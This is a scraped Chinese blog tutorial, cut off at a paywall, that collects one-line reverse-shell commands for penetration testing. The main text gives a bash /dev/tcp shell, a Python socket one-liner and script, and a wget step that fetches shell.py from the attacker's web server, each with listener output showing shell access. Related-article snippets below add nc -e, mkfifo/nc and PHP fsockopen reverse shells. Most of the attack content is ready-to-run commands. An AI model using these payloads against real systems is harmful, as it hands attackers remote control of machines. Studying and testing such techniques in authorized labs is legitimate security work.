常用的一句话反弹shell总结

最新推荐文章于 2024-08-27 17:14:10 发布
最新推荐文章于 2024-08-27 17:14:10 发布
阅读量1.3w 收藏 60
点赞数 10
分类专栏: kali Linux 渗透测试 文章标签: 反弹shell 一句话反弹shell Kali Linux渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38684504/article/details/90047213
版权
本文总结了渗透测试中常用的一句话反弹shell方法,包括bash、python、php等多种方式,以及如何利用nc命令、Kali内置脚本和msfvenom生成反弹shell。详细阐述了每种方式的操作步骤,帮助安全研究人员快速获取目标系统的控制权。
摘要由CSDN通过智能技术生成

目录

常用的一句话反弹shell总结

1. bash直接反弹

2. python一句话反弹shell

3. python脚本反弹shell

4. php一句话反弹shell

5. php脚本反弹shell

6. 使用nc命令获取靶机的反弹shell;

7. 使用Kali自带的脚本文件获取反弹shell

8. 使用msfvenom 获取一句话反弹shell

常用的一句话反弹shell总结

1. bash直接反弹

1.1> 在监听机上开启监听

nc -nvlp 8080

1.2> 在目标主机上写入bash反弹一句话

bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
  • bash -i:产生一个bash的交互环境;
  • >&:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者;
  • /dev/tcp/192.168.37.131/8080:与目标主机192.168.37.131/8080端口建立一个TCP连接;
  • 0>&1:将标准输入与标准输出相结合,重定向到前面标准输出内容;

1.3> 查看监听机上是否监听到shell;

root@root:~# nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 46567
[tom@redhat home]$ whoami
whoami
tom
[tom@redhat home]$ pwd
pwd
/home
[tom@redhat home]$

2. python一句话反弹shell

2.1> 直接在Kali上监听1234端口,在靶机上执行如下命令:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
[tom@redhat tmp]$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2.2> 在Kali上查看监听到的1234端口,获取反弹shell;

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35065
sh-4.1$ whoami
whoami
tom
sh-4.1$

3. python脚本反弹shell

3.1> 在Kali的web访问目录下准备shell.py;并执行python -m SimpleHTTPServer 80,搭建简易Web服务(注:web服务在/var/www/html目录下开启,当然也可以直接开启阿帕奇服务 /etc/init.d/apache2 start);

root@root:~# cd /var/www/html/
root@root:/var/www/html# vim shell.py
root@root:/var/www/html# cat shell.py   #shell.py的内容
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.37.131",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
root@root:/var/www/html# /etc/init.d/apache2 start     #开启Apache服务
[ ok ] Starting apache2 (via systemctl): apache2.service.

3.2> 将python shell脚本下载到目标靶机系统;(一般下载到/tmp目录下)

[tom@redhat tmp]$ wget http://192.168.37.131/shell.py
--2019-05-20 13:54:58--  http://192.168.37.131/shell.py
正在连接 192.168.37.131:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:218 [text/x-python]
正在保存至: “shell.py.1”

100%[======================================>] 218         --.-K/s   in 0s      

2019-05-20 13:54:58 (13.6 MB/s) - 已保存 “shell.py.1” [218/218])

3.3> 下载成功后,在Kali上开启监听端口1234;并在靶机上运行python脚本 ;

在Kali上开启监听端口1234:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...

 在靶机上执行下载的python

最低0.47元/天 解锁文章
橘子女侠
关注
专栏目录
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4741
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1265
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
一句话反弹shell
Jim的博客
08-21 4562
1.Bash: •bash–i >&/dev/tcp/10.0.0.1/80800>&1  //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符: •1.标准输入:代码为0,使用 •2.标准输出:代码为1,使用>或>>; •3.标准错误输出:
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
baimao__Ch的博客
08-27 950
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
Linuxtone命令一句话(定期更新)
weixin_34242658的博客
06-25 242
来源:[url]http://bbs.linuxtone.org/thread-16-1-1.html[/url]作者:NetSeek 1.删除0字节文件 find -type f -size 0 -exec rm -rf {} \; 2.查看进程 按内存从大到小排列 ps -e-o "%C: %p : %z : %a"|sort -k5 -nr ...
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2192
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
反弹shell一句话
08-31
- *1* [常用一句话反弹shell总结](https://blog.csdn.net/qq_38684504/article/details/90047213)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
Linux反弹Shell总结
qq_45600801的博客
01-06 4308
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
常用一句话反弹shell总结
weixin_45116657的博客
10-19 1343
哈哈哈
linux各种一句话反弹shell总结
mingyqf的博客
01-18 1294
【技术分享】linux各种一句话反弹shell总结 阅读量 1355554 | 评论 2 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jT8KDx3o-1642484911491)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhX
反弹shell--bash一句话解析
小刚的博客
01-10 3299
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并 bash反弹shell解析 最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处 真是妙蛙种子被踢出了米奇妙妙屋。。。 bash -i >& /dev/tcp/192.168.1.1/8888 0>&1 拆分语句了解一下 交互式 bash -i是打开一个.
php一句话反弹bash shell
aixuan9365的博客
04-21 493
来源:https://www.leavesongs.com/PHP/backshell-via-php.html 用到了,记录一下 $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => ...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1416
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
各种语言一句话反弹shell
weixin_33947521的博客
12-30 164
转自:http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shellBash [不通用,跟linux发行版本有关,在ubuntu上测试成功]bash-i>&/dev/tcp/10.0.0...
php反弹,php一句话反弹bash shell
weixin_36361396的博客
03-10 192
OpenCV2+入门系列(四):计算图像的直方图,平均灰度,灰度方差本篇懒得排版,直接在网页html编辑器编辑 在图像处理时,我们常常需要求出图像的直方图.灰度平均值.灰度的方差,这里给出一个opencv2+自带程序,实现这些功能. 直方图 对于直方图,使用cv::c ...ARM9的中断控制器简要复习一下ARM9中断控制器的控制过程: 1.首先能识别触发的中断(对应中断源必须打...
一句话反弹shell代码
09-10
### 回答1: "bash -i >& /dev/tcp/IP地址/端口号 0>&1"。 这是一句简单的 Bash 命令,用于在远程主机上打开一个反弹 shell。它使用了 Bash 的内置命令 "bash -i" 来启动一个交互式 shell,并使用 ">&" 和 "/dev/tcp/IP地址/端口号" 来将 shell 的输入和输出重定向到远程主机上的指定 IP 地址和端口。这样,你就可以在远程主机上运行命令并获得输出,就像在本地 shell 中一样。 注意:使用反弹 shell 是一种非常危险的操作,应该只在拥有合法权限的情况下使用。如果你在没有合法权限的情况下使用反弹 shell,你可能会触犯法律。 ### 回答2: 反弹shell代码是指通过在目标计算机上执行恶意代码,将计算机中的shell连接会话转移到攻击者控制的远程服务器上。这样,攻击者就能够远程控制目标计算机。一句话反弹shell代码是一种常见的恶意代码,攻击者通常通过利用漏洞将这段代码注入到目标服务器的Web应用程序中。 以下是一个简单的一句话反弹shell代码的示例: ``` <?php $sock=fsockopen("攻击者的IP地址",攻击者的端口);shell_exec("/bin/sh -i <&3 >&3 2>&3");?> ``` 以上代码中,“攻击者的IP地址”需要替换为攻击者服务器的实际IP地址,“攻击者的端口”需要替换为攻击者服务器监听的实际端口。 当目标服务器上的Web应用程序执行包含以上代码的恶意请求时,它将尝试与攻击者的服务器建立连接。一旦成功连接,攻击者就可以通过与目标计算机建立的连接会话执行命令、获取敏感信息或者进行其他恶意活动。 使用这种方式执行恶意代码是非法的,并且对网络安全造成威胁。为了保护网络安全,服务器管理员需要定期更新软件和系统补丁,同时对输入进行有效的过滤和验证,以防止类似的攻击。 ### 回答3: 反弹shell代码是一种利用网络连接远程控制目标操作系统的方法。以下是一个300字的中文回答: 反弹shell代码是一种用于在网络中远程控制目标操作系统的技术,可以实现向目标计算机发送命令并接收返回结果。该代码通常被黑客用于非法活动,因此对于正当目的者来说,了解反弹shell代码的原理和方法是非常重要的。 反弹shell代码的基本原理是将一个后门程序或指令嵌入到目标系统中,使得黑客可以通过网络连接远程操控目标系统。当黑客成功地将后门程序或指令嵌入到目标系统后,他们就能够通过特定的网络端口或协议监听并等待一个连接。一旦有连接建立,黑客就能够与目标系统建立通信,并发送命令执行特定的操作。 反弹shell代码常见的用途包括获取目标系统的敏感信息、执行某些操作以获取非法利益或破坏目标系统的安全性。因此,了解反弹shell代码以及如何防范其攻击是非常重要的。对于普通用户来说,保持操作系统和软件的最新补丁、不安全网站、可疑附件和链接、避免打开来历不明的文件等都是预防黑客利用反弹shell代码攻击的有效方法。 总而言之,反弹shell代码是一种通过网络连接远程控制目标操作系统的技术。对于黑客来说,它是一种非法的工具,但对于系统管理员和安全专家来说,了解其原理和如何防范攻击是非常重要的。通过采取适当的安全措施,我们可以减少反弹shell代码对我们系统的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值